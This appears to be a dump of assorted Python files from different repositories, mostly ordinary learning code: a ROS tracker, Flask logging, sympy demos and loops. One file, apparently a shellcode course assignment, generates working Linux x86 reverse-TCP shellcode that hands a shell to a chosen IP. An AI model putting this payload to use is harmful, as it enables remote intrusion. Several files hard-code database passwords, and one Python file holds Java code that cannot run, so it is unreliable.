90e27cf3514a0ac329f60d161e1aed9cb2336868 | Python | Hidenaka82/Shopping-fruits | /test.py | UTF-8 | 1,189 | 4.15625 | 4 | [] | no_license |
# Tiny fruit-shop REPL: ask for a budget, offer every product in turn,
# and deduct purchases until the user declines another round.
items = {'apple': 1, 'banana': 2, 'orange': 4}

while True:
    money = int(input('Please enter your budgeds to purchase fruits: $'))

    for item_name in items:
        #print('--------------------------------------------------')
        print('You have $' + str(money) + ' to purchase products')
        print(item_name + ' costs $' + str(items[item_name]) )
        input_count = input('Please enter how many ' + item_name + ' you would like to purchase:')
        print('You will purchase' + input_count + "of" + item_name)
        count = int(input_count)
        total_price = items[item_name] * count
        print('Total will be $' + str(total_price) )
        if money >= total_price:
            print("you purchased "+ input_count + "of " + item_name)
            money -= total_price
            if money == 0:
                print("It's out of budges!")
        else:
            print('There is no enough money to purchase products')
            print("I'm sorry, you could not buy "+ item_name)
        print('You have $' + str(money) + ' Left')

    # BUG FIX: the original read `play_again = money(...)` — calling the
    # int budget as if it were a function, which always raised TypeError.
    # The intent was clearly to prompt the user with input().
    play_again = input("If you'd like to purchase again, plese type 'yes' ")
    if play_again == 'yes':
        continue
    else:
        break
3c949cc737e3b04c28c04d243823591c8d302832 | Python | LYSuperCarrot/tracking-robot | /my_yolo_track/scripts/start_tracking.py | UTF-8 | 4,173 | 2.53125 | 3 | [] | no_license | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
from mdl_people_tracker.msg import TrackedPersons2d
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Twist
# Module-level state shared between the subscriber callback and the
# publisher loop in listener().
speed = 0.0 # global speed of turtlebot
turn = 0.0 # turning rate
name = "" # track_id of the person being followed
distance = -1 # desired following distance (set interactively)
track_index = 0 # index of the tracked person inside data.boxes
saved_depth = 0.0 # if the people dismiss due to the obstcale from camera, save the lasted distance between camera and object, then move robot to the dismissing position
data_boxes = [] # last received set of bounding boxes
def get_time(depth):
    """Travel time (seconds) to cover *depth* at the fixed robot speed 0.1."""
    robot_speed = 0.1  # hard-coded cruise speed
    return depth / robot_speed
def callback(data):
    """Subscriber callback for tracked-person bounding boxes.

    While no target is selected (name=="" and distance==-1), interactively
    ask the operator for a track_id and a following distance. Afterwards,
    update the global speed/turn commands from the tracked box's depth and
    horizontal centre (centre band is 280-320 px).

    NOTE(review): input() blocks inside a subscriber callback, and under
    Python 3 input() returns str, which would make the depth/distance
    comparisons below raise TypeError — presumably written for Python 2;
    confirm the target interpreter.
    """
    #print data.boxes
    global speed
    global turn
    global name
    global distance
    global track_index
    global data_boxes
    data_length = len(data.boxes)
    data_boxes = data.boxes
    if(data_length): # there is boxes transmitted here
        if(name == "" and distance == -1):
            # Target-selection phase: keep prompting until the entered id
            # matches a track_id in the current boxes.
            id_flag = False # id flag
            while(not id_flag):
                i = 0 # index
                name = input("Please input a people id as the tracking target>>")
                distance = input("Please input the distance between people and turtlebot>>")
                for obj in data.boxes:
                    if(data.boxes[i].track_id == name):
                        print("track_id is found, target selected...")
                        id_flag = True
                        track_index = i
                    else:
                        print("target searching...")
                        i+=1
        else:
            # Tracking phase: derive forward speed from depth error and
            # turn rate from the box centre's offset from the image centre.
            bbox_center = data.boxes[track_index].x + data.boxes[track_index].w/2
            if(data.boxes[track_index].depth > distance):
                speed = 0.1
                print("forward")
            if(data.boxes[track_index].depth < distance):
                speed = -0.1
                print("drawback")
            if(data.boxes[track_index].depth == distance):
                speed = 0.0
                print("stop")
            if(bbox_center > 320):
                print("TURN RIGHT")
                turn = -0.1
            if (bbox_center < 280):
                print("TURN LEFT")
                turn = 0.1
            if (bbox_center >=280 and bbox_center <= 320):
                print("CENTERED")
                turn = 0.0
    else:
        # No detections: stop the robot.
        speed = 0.0
        turn = 0.0
        print("No data received...")
def listener():
    """Interactive entry point: ask for the target id and distance, then
    publish Twist commands at ~10 Hz based on the globals updated by
    callback() until ROS shuts down."""
    # In ROS, nodes are uniquely named. If two nodes with the same
    # name are launched, the previous one is kicked off. The
    # anonymous=True flag means that rospy will choose a unique
    # name for our 'listener' node so that multiple listeners can
    # run simultaneously.
    rospy.init_node('start_tracking_node', anonymous=True)
    global speed
    global turn
    global name
    global distance
    name = input("Please input a people id as the tracking target>>")
    distance = input("Please input the distance between people and turtlebot>>")
    twist = Twist()
    pub = rospy.Publisher('~cmd_vel', Twist, queue_size=1)
    #rospy.Subscriber('/mdl_people_tracker/tracked_persons_2d ', TrackedPersons2d, callback)
    rospy.Subscriber("/mdl_people_tracker/tracked_persons_2d", TrackedPersons2d, callback)
    while not rospy.is_shutdown():
        # turn if we hit the line
        if ( turn != 0.0 or speed != 0.0):
            print("speed is %s" %speed)
            print("turn is %s" %turn)
            twist.linear.x = speed; twist.linear.y = 0; twist.linear.z = 0
            twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = turn
            turn = 0.0
        # straight otherwise
        else:
            print("stop %s" %speed)
            twist.linear.x = 0.0; twist.linear.y = 0; twist.linear.z = 0
            twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = 0
        # send the message and delay
        pub.publish(twist)
        rospy.sleep(0.1)
    # spin() simply keeps python from exiting until this node is stopped
    # NOTE(review): reached only after is_shutdown() is already true.
    rospy.spin()
if __name__ == '__main__':
listener() | true |
2b03c7b2aa5eb25b203b5f71a3d5640ac6e6853c | Python | kamchung322/headfirstpython | /webapp/vsearch4web.py | UTF-8 | 2,712 | 2.609375 | 3 | [] | no_license | from flask import Flask, render_template, request, redirect, escape, copy_current_request_context
from vsearch import search4letters
from DBcm import UseDatabase
from threading import Thread
import time
# Flask application object plus the MySQL connection settings consumed by
# DBcm.UseDatabase in the view functions below.
app = Flask(__name__)
app.config['dbconfig'] = {'host': '127.0.0.1',
                          'user': 'vsearch',
                          'password': 'vsearchpasswd',
                          'database': 'vsearchlogDB'}
# No need to use redirect, it costs 2 request
# Flask can associate more than one URL to given function.
# @app.route('/')
# def hello() -> '302':
# return redirect('/entry')
@app.route('/search4', methods=['Post'])
def do_search() -> 'html':
    """Run search4letters on the posted phrase/letters, render the result
    page, and log the request to MySQL from a background thread."""
    # use @copy_current_request_context to preserve the data in request
    @copy_current_request_context
    def log_request(req: 'flask_request', res: str) -> None:
        """ log information to vsearch.log """
        # Artificial delay to show that logging runs off the request
        # thread without delaying the response.
        time.sleep(10)
        with UseDatabase(app.config['dbconfig']) as cursor:
            _SQL = """insert into log
                      (phrase, letters, ip, browser_string, results )
                      values
                      (%s, %s, %s, %s, %s)"""
            cursor.execute(_SQL, (req.form['phrase'],
                                  req.form['letters'],
                                  req.remote_addr,
                                  req.user_agent.browser,
                                  res))
    phrase = request.form['phrase']
    letters = request.form['letters']
    results = str(search4letters(phrase, letters))
    try:
        t = Thread(target=log_request, args=(request, results))
        t.start()
        # log_request(request, results)
    except Exception as err:
        # Best-effort logging: failure to start the thread must not break
        # the user's search response.
        print("Some error in log_request :", err)
    return render_template('result.html', the_title='Here are your result',
                           the_phrase=phrase, the_letters=letters, the_results=results,)
@app.route('/')
@app.route('/entry')
def entry_page() -> 'html':
    """Serve the search form; both / and /entry map here."""
    return render_template('entry.html', the_title='Welcome to search4letters on the web!')
@app.route('/viewlog')
def view_the_log() -> 'html':
    """Fetch every logged search from MySQL and render it as a table."""
    contents = []
    with UseDatabase(app.config['dbconfig']) as cursor:
        _SQL = """SELECT phrase, letters, ip, browser_string, results
                  from log"""
        # NOTE(review): debug print left in; consider logging instead.
        print("SQL : ", _SQL)
        cursor.execute(_SQL)
        contents = cursor.fetchall()
    titles = ('Phrase', 'Letters', 'Remote_addr', 'User_agent', 'Results')
    return render_template('viewlog.html',
                           the_title='View log',
                           the_row_titles = titles,
                           the_data = contents)
if __name__ == '__main__':
app.run(debug=True) | true |
bccc3c5db05f7d4fa4b69988fd086173dea27234 | Python | jamesl33/210CT-Course-Work | /task6/main.py | UTF-8 | 1,031 | 3.375 | 3 | [] | no_license | #!/usr/bin/python3
import datetime
from database import Database
from student import Student
from address import Address
def main():
    """Build five sample Student records, load them into the Database
    helper and look one up by its unique id."""
    student1 = Student(1, "Ryan", datetime.date(1978, 1, 12), Address(104, 'Main Street'), datetime.date(2017, 2, 9), '220CT', True)
    student2 = Student(2, "Devin", datetime.date(2000, 1, 12), Address(10, 'Station Road'), datetime.date(2013, 3, 9), '210CT', False)
    student3 = Student(3, "Rob", datetime.date(2002, 4, 2), Address(1, 'Lunch Lane'), datetime.date(2017, 3, 4), '210CT', True)
    student4 = Student(4, "Ellen", datetime.date(1997, 1, 12), Address(1, 'Lunch Lane'), datetime.date(2017, 3, 9), '290COM', False)
    student5 = Student(5, "Taylor", datetime.date(1995, 5, 9), Address(3, 'Judas Lane'), datetime.date(2017, 4, 9), '220CT', True)
    students = [student5, student4, student3, student2, student1]
    db = Database(students)
    # Found student by id in this case it will be a list containing the reference to 'student3'
    print(db.find(3, 'unique_id'))
main()
| true |
0c8b514dfdea1128a738e86fcf0cc23fa1664e57 | Python | sarkeur/terrarium | /database/rotate_delete_db.py | UTF-8 | 745 | 2.75 | 3 | [] | no_license | ## remove old values in database IMPORT ##
import MySQLdb
import time
from time import sleep
## FUNCTIONS ##
def clean_db():
    """Delete temperature rows older than one month from the terrarium DB.

    NOTE(review): connection credentials are hard-coded; consider moving
    them to environment variables or a config file.
    """
    db = MySQLdb.connect(host="localhost",user="root",passwd="nairolfuaebel", db="terrarium")
    cursor = db.cursor()
    try:
        cursor.execute("""DELETE FROM temperature
                      WHERE date_mesure < DATE_SUB(NOW(), INTERVAL 1 MONTH)""")
        db.commit()
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed SystemExit
        # and KeyboardInterrupt; roll back only on real errors.
        db.rollback()
    finally:
        # BUG FIX: close the connection even when the body raises —
        # previously close() was skipped if rollback itself failed.
        db.close()
#### MAIN ####
# Banner, 60 s initial grace period, then purge old rows once per hour,
# forever (the script is expected to run as a daemon).
print ("\n=========================================================================\n")
print ("     Start script \"rotate_delete_db.py\"")
print ("\n=========================================================================\n")
sleep(60)
while(1):
    clean_db()
    sleep(3600)
| true |
57f2ce8da6834596e1f27b838eb5c723da25c2e9 | Python | leh08/web-template | /server/resources/file.py | UTF-8 | 931 | 2.6875 | 3 | [] | no_license | from flask_restful import Resource
from flask_uploads import UploadNotAllowed
from flask import request
from services import uploads
from services.locales import gettext
from schemas.file import FileSchema
# Single module-level schema instance, reused for every request.
file_schema = FileSchema()

class Upload(Resource):
    @classmethod
    def post(cls, flow_name: str):
        """
        Used to upload a file

        The file is stored under a folder named after *flow_name*; on a
        filename conflict, save_file appends a number at the end. Returns
        200 with the stored basename, or 400 when the extension is not
        allowed by the upload set.
        """
        data = file_schema.load(request.files)  # {"file": FileStorage}

        try:
            file_path = uploads.save_file(data["file"], folder=flow_name)
            basename = uploads.get_basename(file_path)
            return {"message": gettext("file_uploaded").format(basename)}, 200
        except UploadNotAllowed:
            # Extension rejected: report it back to the caller.
            extension = uploads.get_extension(data["file"])
            return {"message": gettext("file_illegal_extension").format(extension)}, 400
| true |
19eb03edcca390433487b21ad4e0c4a43ee44d64 | Python | Slumber-HK/SLAEx86 | /Assignment 2 - Reverse TCP/linux_x86_reverse_tcp.py | UTF-8 | 1,498 | 2.9375 | 3 | [] | no_license | import sys;
import re;
def main():
	# Python 2 script: emits a Linux x86 reverse-TCP shellcode string with
	# the target IP and port patched in from the command line.
	if len(sys.argv) != 3:
		print "Usage: python {0} <IP> <PORT>".format(sys.argv[0])
		exit()
	ip = sys.argv[1]
	# Dotted-quad validation: each octet must be 0-255.
	is_valid = re.match("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$", ip)
	if not is_valid:
		print "Do you know what IP is?"
		exit()
	ipNum = ip.split(".")
	try:
		port = int(sys.argv[2])
	except:
		print "Do you know what port is?"
		exit()
	if port < 1 or port > 65535:
		print "Go Learn Network Basics!!"
		exit()
	if port < 1024:
		# Privileged port: warn only, the shellcode is generated anyway.
		print "Are you root to listen on {0}?".format(sys.argv[2])
	# '#06x' yields '0x' + 4 hex digits; the [-4:-2]/[-2:] slices emit the
	# port's high byte first, then the low byte.
	hexPort = "{0:#0{1}x}".format(port,6)
	# Each IP octet is formatted as '0xNN' and its last two hex digits are
	# spliced into the socket-address portion of the shellcode.
	shellcode = ("\\x31\\xc0\\x31\\xdb\\x99\\x52\\x42\\x52\\x42\\x52\\xb0\\x66\\x43\\x89\\xe1\\xcd\\x80\\x68" +
	"\\x" + "{0:#0{1}x}".format(int(ipNum[0]),4)[-2:] +
	"\\x" + "{0:#0{1}x}".format(int(ipNum[1]),4)[-2:] +
	"\\x" + "{0:#0{1}x}".format(int(ipNum[2]),4)[-2:] +
	"\\x" + "{0:#0{1}x}".format(int(ipNum[3]),4)[-2:] +
	"\\x66\\x68" +
	"\\x" + hexPort[-4:-2] + "\\x" + hexPort[-2:] +
	"\\x66\\x52\\x89\\xe1\\x6a\\x10\\x51\\x92\\x52\\xb0\\x66\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x6a\\x02\\x59\\x87\\xda\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x41\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\xb0\\x0b\\x89\\xe3\\x99\\xcd\\x80")
	print "Here is your TCP Reverse Shell shellcode\n"
	print shellcode
if __name__ == "__main__":
	main()
| true |
9b2fd294be850c941d4e4647fdb474c68cef7afd | Python | ymli1997/deeplearning-notes | /numerical/symbol-compute/04-expressions.py | UTF-8 | 2,423 | 3.796875 | 4 | [
"Apache-2.0"
] | permissive | #coding:utf-8
'''
表达式
'''
import sympy
sympy.init_printing()
from sympy import I, pi, oo
# 创建表达式
x = sympy.Symbol("x")
y = sympy.Symbol("y")
expr = 1 + 2 * x**2 + 3 * x**3
print(expr)
print(expr.args)
# 表达式简化
expr = 2 * (x**2 - x) - x * (x + 1)
print(expr)
print('simplify:',sympy.simplify(expr))
print('simplify:',expr.simplify())
expr = 2 * sympy.cos(x) * sympy.sin(x)
print(sympy.simplify(expr))
expr = sympy.exp(x) * sympy.exp(y)
print(expr.simplify())
'''
表达式简化,还可以通过调用sympy.trigsimp,sympy.powsimp,sympy.compsimp和sympy.ratsimp来简化
'''
# 表达式展开
expr = (x + 1) * (x + 2)
print('expand:',sympy.expand(expr))
# 三角函数展开
expr = sympy.sin(x + y)
print('expand:',sympy.expand(expr,trig=True))
print('expand:',expr.expand(trig=True))
expr = x*sympy.sin(x) + sympy.sin(x + y) + y
print('expand:',expr.expand(trig=True))
# 对数函数展开
a, b = sympy.symbols("a, b", positive=True)
print('expand:',sympy.log(a * b).expand(log=True))
# 复函数数展开
expr = sympy.exp(I*a + b)
print('expand:',expr.expand(complex=True))
# 幂函数展开
print('expand:',sympy.expand((a * b)**x, power_base=True))
print('expand:',sympy.exp((a-b)*x).expand(power_exp=True))
# 因式分解、合并同类项,
expr = sympy.factor(x**2 - 1)
print('factor:',expr)
# 三角函数因式分解
z = sympy.Symbol('z')
expr = sympy.factor(x * sympy.cos(y) + sympy.sin(z) * x)
print('factor:',expr)
# 对数函数合并
a = sympy.Symbol('a')
b = sympy.Symbol('b')
expr = sympy.logcombine(sympy.log(a) - sympy.log(b))
print('logcombine:',expr)
# 合并某个同类项
expr = x + y + x * y * z
print('collect x:',expr.collect(x))
print('collect y:',expr.collect(y))
# 通过apart函数简化表达式
expr = 1/(x**2 + 3*x + 2)
print('apart',sympy.apart(expr, x))
# 通过together函数简化表达式
print('together:',sympy.together(1 / (y * x + y) + 1 / (1+x)))
# 通过cancel函数简化表达式
print('cancel:',sympy.cancel(y / (y * x + y)))
# 表达式变量替换
# 将变量x替换成y
expr = (x + y).subs(x, y)
print('subs:x->y:',expr)
expr = sympy.sin(x * sympy.exp(x)).subs(x, y)
print('subs:',expr)
# 一次性替换多个变量
expr = sympy.sin(x * z).subs({z: sympy.exp(y), x: y, sympy.sin: sympy.cos})
print('subs:',expr)
# 表达式变量赋值
expr = x * y + z**2 *x
values = {x: 1.25, y: 0.4, z: 3.2}
print('subs:',expr.subs(values)) | true |
a5240139c3dc314f44ce6e9d411906e764bd1e0b | Python | eventia/zbc_python | /numberdemo.py | UTF-8 | 131 | 2.84375 | 3 | [] | no_license | import sys
# Demonstrate arbitrary-precision ints: going past sys.maxsize simply
# keeps producing plain Python ints — there is no overflow.
t1 = sys.maxsize
t2 = t1 + 1
t3 = t2 ** 10

# Values first, then their types — same output order as before.
for demo_value in (t1, t2, t3):
    print(demo_value)
for demo_value in (t1, t2, t3):
    print(type(demo_value))
| true |
a08f55766efecdc7a97c7cbacc172356a80e56db | Python | Akif-Mufti/Machine-Learning-with-Python | /datapanda.py | UTF-8 | 842 | 3.375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 30 15:11:56 2017
@author: user
"""
# Load CSV using Pandas
from pandas import read_csv
from pandas import set_option
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
data = read_csv(filename, names=names)
print(data.shape)
# View first 20 rows
peek = data.head(20)
print(peek)
types = data.dtypes
print(types)
data = read_csv(filename, names=names)
set_option('display.width', 100)
set_option('precision', 3)
# Statistical Summary
description = data.describe()
print(description)
# Class Distribution
class_counts = data.groupby('class').size()
print(class_counts)
# Pairwise Pearson correlations
correlations = data.corr(method='pearson')
print(correlations)
# Skew for each attribute
skew = data.skew()
print(skew) | true |
b0b5a65c56695f0a98a2ddb027a091212df17070 | Python | PetterMinne/bachelor-drone | /Pyscripts/client.py | UTF-8 | 666 | 2.828125 | 3 | [] | no_license | import socket
def Main():
host = '127.0.0.1'
port = 5000
mySocket = socket.socket()
mySocket.connect((host,port))
x=0
y=7
messagex = str(x) +'#'+str(y)
while x != 10:
mySocket.send(messagex.encode())
data = mySocket.recv(1024).decode()
print ('Received from server: ' + data)
x = x+1
messagex = str(x) + '#'+str(y)
mySocket.close()
if __name__ == '__main__':
Main()
| true |
894475263bc04631689090a3d14c7c4172f276d6 | Python | HalfMoonFatty/Interview-Questions | /337. House Robber III.py | UTF-8 | 3,366 | 4.03125 | 4 | [] | no_license | '''
Problem:
The thief has found himself a new place for his thievery again. There is only one entrance to this area, called the "root."
Besides the root, each house has one and only one parent house. The thief realized that all houses in this place forms a binary tree.
It will automatically contact the police if two directly-linked houses were broken into on the same night.
Determine the maximum amount of money the thief can rob tonight without alerting the police.
Example 1:
3
/ \
2 3
\ \
3 1
Maximum amount of money the thief can rob = 3 + 3 + 1 = 7.
Example 2:
3
/ \
4 5
/ \ \
1 3 1
Maximum amount of money the thief can rob = 4 + 5 = 9.
'''
'''
Step I -- Recursion
'''
public int rob(TreeNode root) {
if (root == null) {
return 0;
}
int val = 0;
if (root.left != null) {
val += rob(root.left.left) + rob(root.left.right);
}
if (root.right != null) {
val += rob(root.right.left) + rob(root.right.right);
}
return Math.max(val + root.val, rob(root.left) + rob(root.right));
}
'''
Step II -- use a hash map to record the results for visited subtrees (overlapping of the subproblems)
'''
public int rob(TreeNode root) {
Map<TreeNode, Integer> map = new HashMap<>();
return robSub(root, map);
}
private int robSub(TreeNode root, Map<TreeNode, Integer> map) {
if (root == null) return 0;
if (map.containsKey(root)) return map.get(root);
int val = 0;
if (root.left != null) {
val += robSub(root.left.left, map) + robSub(root.left.right, map);
}
if (root.right != null) {
val += robSub(root.right.left, map) + robSub(root.right.right, map);
}
val = Math.max(val + root.val, robSub(root.left, map) + robSub(root.right, map));
map.put(root, val);
return val;
}
'''
Step III -- Think one step back
For each tree root, there are two scenarios: it is robbed or is not. rob(root) does not distinguish between these two cases,
so "information is lost as the recursion goes deeper and deeper", which resulted in repeated subproblems.
Redefine rob(root) as a new function which will return an array of two elements:
the 1st element denotes the maximum amount of money robbed if root is robbed = root.val + rob(root.left)[1] + rob(root.right)[1]
the 2nd element denotes the maximum amount of money that can be robbed if root is NOT robbed = max(leftVals[0],leftVals[1]) + max(rightVals[0],rightVals[1])
dfs all the nodes of the tree, each node return two number, int[] num,
num[0] is the max value while rob this node, num[1] is max value while not rob this value.
'''
class Solution(object):
def rob(self, root):
def dfs(root):
if not root: return [0,0]
leftVals = dfs(root.left)
rightVals = dfs(root.right)
res = [0,0]
# root is robbed and not rob the nodes of root.left and root.right
res[0] = root.val + leftVals[1] + rightVals[1]
# root is not robbed and we are free to rob the left and right subtrees.
res[1] = max(leftVals[0],leftVals[1]) + max(rightVals[0],rightVals[1])
return res
result = dfs(root)
return max(result[0],result[1])
| true |
3028524bdb55c02308aa19ccd5a715d6565859ca | Python | Infinite-Loop-KJSIEIT/Project-Euler | /27.py | UTF-8 | 468 | 3.03125 | 3 | [] | no_license | import itertools
a=[0]*(10**6)
for i in range(2,len(a)):
for j in range(2*i,10**6,i):
a[j]=1
prime=set()
for i in range(2,10**6):
if a[i]==0:
prime.add(i)
def isp(n):
if n in prime:
return True
return False
def conp(ab):
a,b=ab
for i in itertools.count():
n=i*i+i*a+b
if not isp(n):
return i
ans=max(((a,b) for a in range(-999,1000) for b in range(2,1000)), key=conp)
print(ans[0]*ans[1])
| true |
c9a508e14c47940589fcbd68710f877d88637e9b | Python | MarsWilliams/PythonExercises | /LearnPythonTheHardWay/ex19.py | UTF-8 | 1,298 | 4.625 | 5 | [] | no_license | #takes two arguments and prints them back within strings
def cheese_and_crackers(cheese_count, boxes_of_crackers):
print "You have %d cheeses!" % cheese_count
print "You have %d boxes of crackers!" % boxes_of_crackers
print "Man that's enough for a party!"
print "Get a blanket. \n"
#prints a string
print "We can just give the function numbers directly:"
#passes two arguments to the function cheese_and_crackers
cheese_and_crackers(20, 30)
#prints a string
print "Or, we can use variable from our script:"
#assigns an integer to a variable
amount_of_cheese = 10
#assigns an integer to a variable
amount_of_crackers = 50
#passes two arguments (that point to the information stored in two variables) to the function cheese_and_crackers
cheese_and_crackers(amount_of_cheese, amount_of_crackers)
#prints a string
print "We can even do math inside too:"
#passes to equations to evaluate as arguments to the function cheese_and_crackers
cheese_and_crackers(10 + 20, 5 + 6)
#prints a string
print "And we can combine the two, variable and math:"
#passes two arguments to the function cheese_and_crackers. Both point to previously defined variables, and both modify the information contained in those variables.
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
| true |
ee3262d41433c8ceaac5c0fd30be7381d37b241c | Python | MollyInThatOJ/cmpsc465-fa20 | /assignment1/problem2/DQV5105CMPSC465HW1PT2.py | UTF-8 | 472 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 2 21:14:50 2020
@author: mama
"""
line1 = input()
line2 = [int(i) for i in input().split()]
n1 = line1[0]
n2 = line2[0]
sortedout = [None]*(n1)
i = 0
k = 0
for i in line2:
if i==min(line2):
sortedout[k] = min(line2)
print(line2[min(line2)])
line2.pop(line2[i])
k+=1
out =str(sortedout[0])
for i in sortedout[1:]:
out+=' '+str(i)
print(out) | true |
193edca118761cc9a4fd8a6a7745914f30d7885f | Python | Aasthaengg/IBMdataset | /Python_codes/p02845/s595783119.py | UTF-8 | 240 | 2.96875 | 3 | [] | no_license | n = int(input())
a = list(map(int,input().split()))
mod = 10**9+7
see = [0 for i in range(n)]
ans = 1
for i in range(n):
x = a[i]
if x == 0:
ans = ans*(3-see[x])%mod
else:
ans = ans*(see[x-1]-see[x])%mod
see[x]+=1
print(ans) | true |
7c83694aa637f64705113a567067b63900ce010a | Python | chriskopacz/python_practice | /Problems/lev3/lev3_q18.py | UTF-8 | 2,138 | 4.125 | 4 | [] | no_license | #Chris Kopacz
#Python Exercises from Github
#Level 3, question 18
#created: 26 June 2017
"""
Question 18
Level 3
Question:
A website requires users to input username and password to register. Write a program to
check the validity of passwords input by users.
Following are the criteria for checking the password:
1. At least one letter between [a-z]
2. At least one number between [0-9]
3. At least one letter between [A-Z]
4. At least one character from [$#@]
5. Minimum length of 6 characters
6. Maximum length of 12 characters
Your program should accept a sequence of comma-separated passwords and will check them
according to the above criteria. Passwords that match the criteria are to be printed,
each separated by a comma.
Example:
If the following passwords are given as input to the program:
ABd1234@1,a F1#,2w3E*,2We3345
Then the output should be:
ABd1234@1
"""
import re
#==================
#define checkPass()
def checkPass(a):
if len(a)>=6 and len(a)<=12:
if re.search("[a-z]",a):
if re.search("[0-9]",a):
if re.search("[A-Z]",a):
if re.search("[$#@]",a):
return a
else:
return '0'
else:
return '0'
else:
return '0'
else:
return '0'
else:
return '0'
#==============
#define main()
def main():
passList = []
returnList = []
validList = []
result = ''
userIn = input('Enter a list of comma-separated passwords:\n>>> ')
passList = userIn.split(',')
for iter in range(0,len(passList)):
returnList.append(checkPass(passList[iter]))
for iter in range(0,len(returnList)):
if returnList[iter] != '0':
validList.append(returnList[iter])
if len(validList) > 1:
result = ','.join(validList)
print(result)
elif len(validList)==1:
result = validList[0]
print(result)
else:
result = 'None'
print(result)
#===========
#call main()
if __name__ == "__main__":
main()
| true |
7884422147ec00d9578d7628ac5ac9d1f77b61a4 | Python | opasha/Python | /string_representation.py | UTF-8 | 570 | 4.3125 | 4 | [] | no_license | class Fighter:
def __init__(self, name):
self.name = name
self.health = 100
self.damage = 10
def attack(self, other_guy):
other_guy.health = other_guy.health - self.damage #other_guy is omar, self is joe
print("{} attacks {}!".format(self.name, other_guy.name))
print("{} loses {} health points!".format(other_guy.name, self.damage))
def __str__(self):
return "{}: {}".format(self.name, self.health) #overrides the print method to make things cleaner
omar = Fighter("Omar")
joe = Fighter("Joe")
print(omar)
print(joe)
joe.attack(omar)
print(omar) | true |
ded48a66eb46c0d750e2b9afd1040c9753258fe3 | Python | tkkhuu/SelfDrivingBehavioralCloning | /model/DataLoaderBC.py | UTF-8 | 2,358 | 2.671875 | 3 | [] | no_license | import cv2
import numpy as np
from sklearn.utils import shuffle
from TKDNNUtil.DataLoader import DataLoader
class DataLoaderBC(DataLoader):
def GenerateTrainingBatch(self, samples, batch_size=32, flip_images=True, side_cameras=True):
num_samples = len(samples)
while 1: # Loop forever so the generator never terminates
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
car_images = []
steering_measurements = []
for line in batch_samples:
source_path = line[0]
filename = source_path.split('/')[-1]
current_path = '../SimData/IMG/' + filename
image = cv2.imread(current_path)
measurement = float(line[3])
car_images.append(image)
steering_measurements.append(measurement)
if flip_images:
car_images.append(cv2.flip(image, 1))
steering_measurements.append(measurement*-1.0)
steering_correction = 0.25
if side_cameras:
left_source_path = line[1]
left_filename = left_source_path.split('/')[-1]
left_current_path = '../SimData/IMG/' + left_filename
left_image = cv2.imread(left_current_path)
car_images.append(left_image)
steering_measurements.append(measurement + steering_correction)
right_source_path = line[2]
right_filename = right_source_path.split('/')[-1]
right_current_path = '../SimData/IMG/' + right_filename
right_image = cv2.imread(right_current_path)
car_images.append(right_image)
steering_measurements.append(measurement - steering_correction)
# trim image to only see section with road
X_train = np.array(car_images)
y_train = np.array(steering_measurements)
yield shuffle(X_train, y_train) | true |
c422fb5da36b914899b8998631772e675b4b0069 | Python | jamendo/jamendo-recommendation-sdk | /algorithms/averageitemadj.py | UTF-8 | 815 | 2.796875 | 3 | [] | no_license | from algorithms import AlgorithmBase as A
import numpy as N
class Algorithm(A):
itemsToRatings = {}
ratingAverage=0.0
itemadjK = 3
def train(self,rating):
self.itemsToRatings.setdefault(rating[1],[])
self.itemsToRatings[rating[1]].append(rating[2])
self.ratingAverage+=rating[2]
def postTraining(self,dataset):
self.ratingAverage /= self.ratingCount
#derived from experimentation - average ratings per movie / 2 (=3 for jamendoreviews)
self.itemadjK = self.ratingCount*0.5/len(self.itemsToRatings)
def predict(self,userId,itemId):
return (self.ratingAverage*self.itemadjK + N.sum(self.itemsToRatings.get(itemId,[0]))) / (self.itemadjK + len(self.itemsToRatings.get(itemId,[])))
| true |
ad8f8a019896a44c29121c6dc217b466a89a694c | Python | ssh0/6-2_bifurcate | /myplot_bifurcation_animation.py | UTF-8 | 1,060 | 2.875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# written by Shotaro Fujimoto, May 2014.
#
import matplotlib.pylab as plt
import matplotlib.animation as animation
import array as array
import numpy as np
fig = plt.figure()
def Plot(func, x0, ntransient, nplot, r0, rmax, dr):
def callback(n):
_Plot(func, r0+dr*n, x0, ntransient, nplot)
plt.gca().set_xlim(r0,rmax)
plt.gca().set_ylim(0,1)
plt.xlabel(r'$r$', fontsize=16)
plt.ylabel(r'$x$', fontsize=16)
plt.title('Bifurcation Diagram')
count=int((rmax-r0)/dr)
animation.FuncAnimation(fig=fig, func=callback, frames=count + 1, repeat=False)
plt.show()
def _Plot(function, r, x0, ntransient, nplot):
n=ntransient+nplot*2
x=array.array('f')
x.append(x0)
for i in range(n):
x.append(function(x[i], r))
plt.scatter([r]*nplot, x[ntransient+1:ntransient+nplot+1],
color='r', s=0.1, marker='.'
)
plt.scatter([r]*nplot, x[ntransient+nplot+1:n+1],
color='b', s=0.1, marker='.'
)
| true |
b8f61b2e586b377e1fad86a6b27dc348b2c6fcfe | Python | tschamp31/Personal | /Python/Homework/loops.py | UTF-8 | 1,383 | 3.84375 | 4 | [] | no_license | for j in range(10): #Problem 1 - Just reads each range(10) 10 times. Hence the 0,1,etc 10 times.
for i in range(10):
print (i, end = " ")
print()
print()
i = 0
for j in range(10): #Problem 1 Version 2 - Built so it reads them vertically. In reality it reads 0, 10 times and so on.
for k in range(10):
print(i, end =" ")
i = i + 1
print()
print()
j = -1
for i in range(10): #Problem 2 - Adds a new number each new line
for j in range(0, j + 2):
print(j, end = " ")
print()
print()
j = 10
